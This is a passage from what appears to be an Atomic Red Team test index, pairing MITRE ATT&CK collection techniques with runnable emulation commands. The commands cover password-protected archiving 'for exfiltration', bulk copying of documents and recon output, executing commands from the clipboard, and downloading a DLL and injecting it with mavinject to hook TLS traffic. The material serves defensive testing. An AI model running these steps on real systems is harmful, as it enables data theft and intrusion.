- rar a -p"blue" hello.rar (VARIANT)
- supported_platforms:
- - windows
- executor:
- name: command_prompt
- elevation_required: false
- command: |
- mkdir .\tmp\victim-files
- cd .\tmp\victim-files
- echo "This file will be encrypted" > .\encrypted_file.txt
- rar a -hp"blue" hello.rar
- dir
- - name: Compress Data and lock with password for Exfiltration with winzip
- auto_generated_guid: 01df0353-d531-408d-a0c5-3161bf822134
- description: |
- Note: Requires winzip installation
- wzzip sample.zip -s"blueblue" *.txt (VARIANT)
- supported_platforms:
- - windows
- input_arguments:
- winzip_exe:
- description: Path to installed Winzip executable
- type: Path
- default: "%ProgramFiles%\\WinZip\\winzip64.exe"
- winzip_url:
- description: Path to download Windows Credential Editor zip file
- type: url
- default: https://download.winzip.com/gl/nkln/winzip24-home.exe
- winzip_hash:
- description: File hash of the Windows Credential Editor zip file
- type: String
- default: B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB
- dependency_executor_name: powershell
- dependencies:
- - description: 'Winzip must be installed
-
-'
- prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo
- 0)''
-
-'
- get_prereq_command: |
- if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
- Write-Host Follow the installation prompts to continue
- cmd /c "$env:Temp\winzip.exe"
- }
- executor:
- name: command_prompt
- elevation_required: false
- command: |
- path=%path%;"C:\Program Files (x86)\winzip"
- mkdir .\tmp\victim-files
- cd .\tmp\victim-files
- echo "This file will be encrypted" > .\encrypted_file.txt
- "#{winzip_exe}" -min -a -s"hello" archive.zip *
- dir
- - name: Compress Data and lock with password for Exfiltration with 7zip
- auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
- description: 'Note: Requires 7zip installation
-
-'
- supported_platforms:
- - windows
- executor:
- name: command_prompt
- elevation_required: false
- command: |
- mkdir $PathToAtomicsFolder\T1560.001\victim-files
- cd $PathToAtomicsFolder\T1560.001\victim-files
- echo "This file will be encrypted" > .\encrypted_file.txt
- 7z a archive.7z -pblue
- dir
- - name: Data Compressed - nix - zip
- auto_generated_guid: c51cec55-28dd-4ad2-9461-1eacbc82c3a0
- description: 'An adversary may compress data (e.g., sensitive documents) that
- is collected prior to exfiltration. This test uses standard zip compression.
-
-'
- supported_platforms:
- - linux
- - macos
- input_arguments:
- input_files:
- description: Path that should be compressed into our output file, may include
- wildcards
- type: Path
- default: "$HOME/*.txt"
- output_file:
- description: Path that should be output as a zip archive
- type: Path
- default: "$HOME/data.zip"
- dependencies:
- - description: 'Files to zip must exist (#{input_files})
-
-'
- prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else
- exit 1; fi;
-
-'
- get_prereq_command: 'echo Please set input_files argument to include files
- that exist
-
-'
- executor:
- name: sh
- elevation_required: false
- command: 'zip #{output_file} #{input_files}
-
-'
- cleanup_command: 'rm -f #{output_file}
-
-'
- - name: Data Compressed - nix - gzip Single File
- auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af
- description: 'An adversary may compress data (e.g., sensitive documents) that
- is collected prior to exfiltration. This test uses standard gzip compression.
-
-'
- supported_platforms:
- - linux
- - macos
- input_arguments:
- input_file:
- description: Path that should be compressed
- type: Path
- default: "$HOME/victim-gzip.txt"
- input_content:
- description: contents of compressed files if file does not already exist.
- default contains test credit card and social security number
- type: String
- default: 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101'
- executor:
- name: sh
- elevation_required: false
- command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}''
- >> #{input_file}; gzip -k #{input_file})
-
-'
- cleanup_command: 'rm -f #{input_file}.gz
-
-'
- - name: Data Compressed - nix - tar Folder or File
- auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a
- description: 'An adversary may compress data (e.g., sensitive documents) that
- is collected prior to exfiltration. This test uses standard gzip compression.
-
-'
- supported_platforms:
- - linux
- - macos
- input_arguments:
- input_file_folder:
- description: Path that should be compressed
- type: Path
- default: "$HOME/$USERNAME"
- output_file:
- description: File that should be output
- type: Path
- default: "$HOME/data.tar.gz"
- dependencies:
- - description: 'Folder to zip must exist (#{input_file_folder})
-
-'
- prereq_command: 'test -e #{input_file_folder}
-
-'
- get_prereq_command: 'echo Please set input_file_folder argument to a folder
- that exists
-
-'
- executor:
- name: sh
- elevation_required: false
- command: 'tar -cvzf #{output_file} #{input_file_folder}
-
-'
- cleanup_command: 'rm -f #{output_file}
-
-'
- - name: Data Encrypted with zip and gpg symmetric
- auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f'
- description: 'Encrypt data for exiltration
-
-'
- supported_platforms:
- - macos
- - linux
- input_arguments:
- test_folder:
- description: Path used to store files.
- type: Path
- default: "/tmp/T1560"
- test_file:
- description: Temp file used to store encrypted data.
- type: Path
- default: T1560
- encryption_password:
- description: Password used to encrypt data.
- type: string
- default: InsertPasswordHere
- dependency_executor_name: sh
- dependencies:
- - description: gpg and zip are required to run the test.
- prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)"
- ]; then exit 1; fi;
-
-'
- get_prereq_command: 'echo "Install gpg and zip to run the test"; exit 1;
-
-'
- executor:
- name: sh
- elevation_required: false
- command: |
- mkdir -p #{test_folder}
- cd #{test_folder}; touch a b c d e f g
- zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./*
- echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip
- ls -l #{test_folder}
- cleanup_command: 'rm -Rf #{test_folder}'
- T1123:
- technique:
- id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Audio Capture
- description: |-
- An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
-
- Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1123
- external_id: T1123
- - external_id: CAPEC-634
- source_name: capec
- url: https://capec.mitre.org/data/definitions/634.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-07-14T19:42:10.235Z'
- created: '2017-05-31T21:31:34.528Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
-
- Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - File monitoring
- x_mitre_version: '1.0'
- identifier: T1123
- atomic_tests:
- - name: using device audio capture commandlet
- auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95
- description: "[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)\n"
- supported_platforms:
- - windows
- executor:
- command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
-
-'
- name: powershell
- T1119:
- technique:
- created: '2017-05-31T21:31:27.985Z'
- modified: '2020-03-31T22:18:43.019Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- type: attack-pattern
- id: attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Automated Collection
- description: "Once established within a system or network, an adversary may
- use automated techniques for collecting internal data. Methods for performing
- this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)
- to search for and copy information fitting set criteria such as file type,
- location, or name at specific time intervals. This functionality could also
- be built into remote access tools. \n\nThis technique may incorporate use
- of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)
- and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to
- identify and move files."
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1119
- external_id: T1119
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_system_requirements:
- - Permissions to access directories and files that store information of interest.
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_permissions_required:
- - User
- x_mitre_detection: Depending on the method used, actions could include common
- file system commands and parameters on the command-line interface within batch
- files or scripts. A sequence of actions like this may be unusual, depending
- on the system and network environment. Automated collection may occur along
- with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074).
- As such, file access monitoring that shows an unusual process performing sequential
- file opens and potentially copy actions to another location on the file system
- for many files at once may indicate automated collection behavior. Remote
- access tools with built-in features may interact directly with the Windows
- API to gather data. Data may also be acquired through Windows system management
- tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
- and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - File monitoring
- - Data loss prevention
- - Process command-line parameters
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- identifier: T1119
- atomic_tests:
- - name: Automated Collection Command Prompt
- auto_generated_guid: cb379146-53f1-43e0-b884-7ce2c635ff5b
- description: |
- Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection
- to see what was collected.
- supported_platforms:
- - windows
- executor:
- command: |
- mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
- dir c: /b /s .docx | findstr /e .docx
- for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
- cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
-
-'
- name: command_prompt
- - name: Automated Collection PowerShell
- auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313
- description: |
- Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection
- to see what was collected.
- supported_platforms:
- - windows
- executor:
- command: |
- New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null
- Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection}
- cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force
- -ErrorAction Ignore | Out-Null
-
-'
- name: powershell
- - name: Recon information for export with PowerShell
- auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26
- description: |
- collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
- to see what was collected.
- supported_platforms:
- - windows
- executor:
- command: |
- Get-Service > $env:TEMP\T1119_1.txt
- Get-ChildItem Env: > $env:TEMP\T1119_2.txt
- Get-Process > $env:TEMP\T1119_3.txt
- cleanup_command: |
- Remove-Item $env:TEMP\T1119_1.txt -ErrorAction Ignore
- Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore
- Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
- name: powershell
- - name: Recon information for export with Command Prompt
- auto_generated_guid: aa1180e2-f329-4e1e-8625-2472ec0bfaf3
- description: |
- collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
- to see what was collected.
- supported_platforms:
- - windows
- executor:
- command: |
- sc query type=service > %TEMP%\T1119_1.txt
- doskey /history > %TEMP%\T1119_2.txt
- wmic process list > %TEMP%\T1119_3.txt
- tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
- cleanup_command: |
- del %TEMP%\T1119_1.txt >nul 2>&1
- del %TEMP%\T1119_2.txt >nul 2>&1
- del %TEMP%\T1119_3.txt >nul 2>&1
- del %TEMP%\T1119_4.txt >nul 2>&1
- name: command_prompt
- T1115:
- technique:
- id: attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Clipboard Data
- description: "Adversaries may collect data stored in the clipboard from users
- copying information within or between applications. \n\nIn Windows, Applications
- can access clipboard data by using the Windows API.(Citation: MSDN Clipboard)
- OSX provides a native command, pbpaste, to grab clipboard contents.(Citation:
- Operating with EmPyre)"
- external_references:
- - source_name: mitre-attack
- external_id: T1115
- url: https://attack.mitre.org/techniques/T1115
- - external_id: CAPEC-637
- source_name: capec
- url: https://capec.mitre.org/data/definitions/637.html
- - url: https://msdn.microsoft.com/en-us/library/ms649012
- description: Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.
- source_name: MSDN Clipboard
- - url: https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363
- description: rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July
- 12, 2017.
- source_name: Operating with EmPyre
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-04-23T18:35:58.230Z'
- created: '2017-05-31T21:31:25.967Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_detection: Access to the clipboard is a legitimate function of many
- applications on an operating system. If an organization chooses to monitor
- for this behavior, then the data will likely need to be correlated against
- other suspicious or non-user-driven activity.
- x_mitre_data_sources:
- - API monitoring
- x_mitre_version: '1.1'
- identifier: T1115
- atomic_tests:
- - name: Utilize Clipboard to store or execute commands from
- auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
- description: 'Add data to clipboard to copy off or execute commands from.
-
-'
- supported_platforms:
- - windows
- executor:
- command: |
- dir | clip
- echo "T1115" > %temp%\T1115.txt
- clip < %temp%\T1115.txt
- cleanup_command: 'del %temp%\T1115.txt >nul 2>&1
-
-'
- name: command_prompt
- - name: Execute Commands from Clipboard using PowerShell
- auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416
- description: 'Utilize PowerShell to echo a command to clipboard and execute
- it
-
-'
- supported_platforms:
- - windows
- executor:
- command: |
- echo Get-Process | clip
- Get-Clipboard | iex
- name: powershell
- - name: Execute commands from clipboard
- auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
- description: Echo a command to clipboard and execute it
- supported_platforms:
- - macos
- executor:
- command: |-
- echo ifconfig | pbcopy
- $(pbpaste)
- name: bash
- T1213.001:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Confluence
- description: |2
-
- Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
-
- * Policies, procedures, and standards
- * Physical / logical network diagrams
- * System architecture diagrams
- * Technical system documentation
- * Testing / development credentials
- * Work / project schedules
- * Source code snippets
- * Links to network shares and other internal resources
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T16:42:09.222Z'
- created: '2020-02-14T13:09:51.004Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
-
- User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
- x_mitre_data_sources:
- - Third-party application logs
- - Authentication logs
- x_mitre_platforms:
- - SaaS
- atomic_tests: []
- T1056.004:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Endgame Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Credential API Hooking
- description: |
- Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
- * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017)
- * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-24T21:29:13.565Z'
- created: '2020-02-11T19:01:15.930Z'
- x_mitre_data_sources:
- - Windows event logs
- - Process monitoring
- - Loaded DLLs
- - DLL monitoring
- - Binary file metadata
- - API monitoring
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
- identifier: T1056.004
- atomic_tests:
- - name: Hook PowerShell TLS Encrypt/Decrypt Messages
- auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
- description: 'Hooks functions in PowerShell to read TLS Communications
-
-'
- supported_platforms:
- - windows
- input_arguments:
- file_name:
- description: Dll To Inject
- type: Path
- default: PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll
- server_name:
- description: TLS Server To Test Get Request
- type: Url
- default: https://www.example.com
- dependency_executor_name: powershell
- dependencies:
- - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name})
-
-'
- prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
- get_prereq_command: |
- New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}"
- executor:
- command: |
- mavinject $pid /INJECTRUNNING #{file_name}
- curl #{server_name}
- name: powershell
- elevation_required: true
- T1074:
- technique:
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
- description: |-
- Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
-
- In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
-
- Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: PWC Cloud Hopper April 2017
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- url: https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
- April 24, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-06-24T18:59:16.039Z'
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure
- x_mitre_detection: |-
- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
-
- Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_version: '1.2'
- atomic_tests: []
- T1530:
- technique:
- id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
- description: |-
- Adversaries may access data objects from improperly secured cloud storage.
-
- Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)
-
- Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.
- name: Data from Cloud Storage Object
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - external_id: T1530
- source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1530
- - source_name: Amazon S3 Security, 2019
- url: https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/
- description: Amazon. (2019, May 17). How can I secure the files in my Amazon
- S3 bucket?. Retrieved October 4, 2019.
- - source_name: Microsoft Azure Storage Security, 2019
- url: https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide
- description: Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20).
- Azure Storage security guide. Retrieved October 4, 2019.
- - source_name: Google Cloud Storage Best Practices, 2019
- url: https://cloud.google.com/storage/docs/best-practices
- description: Google. (2019, September 16). Best practices for Cloud Storage.
- Retrieved October 4, 2019.
- - source_name: Trend Micro S3 Exposed PII, 2017
- url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
- description: Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed
- Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.
- - source_name: Wired Magecart S3 Buckets, 2019
- url: https://www.wired.com/story/magecart-amazon-cloud-hacks/
- description: 'Barrett, B.. (2019, July 11). Hack Brief: A Card-Skimming Hacker
- Group Hit 17K Domains—and Counting. Retrieved October 4, 2019.'
- - source_name: HIPAA Journal S3 Breach, 2017
- url: https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/
- description: HIPAA Journal. (2017, October 11). 47GB of Medical Records and
- Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-07-09T14:02:05.276Z'
- created: '2019-08-30T18:07:27.741Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - AWS
- - GCP
- - Azure
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Netskope
- - Praetorian
- x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
- service. Activity originating from unexpected sources may indicate improper
- permissions are set that is allowing access to data. Additionally, detecting
- failed attempts by a user for a certain object, followed by escalation of
- privileges by the same user, and access to the same object may be an indication
- of suspicious activity.
- x_mitre_data_sources:
- - Stackdriver logs
- - Azure activity logs
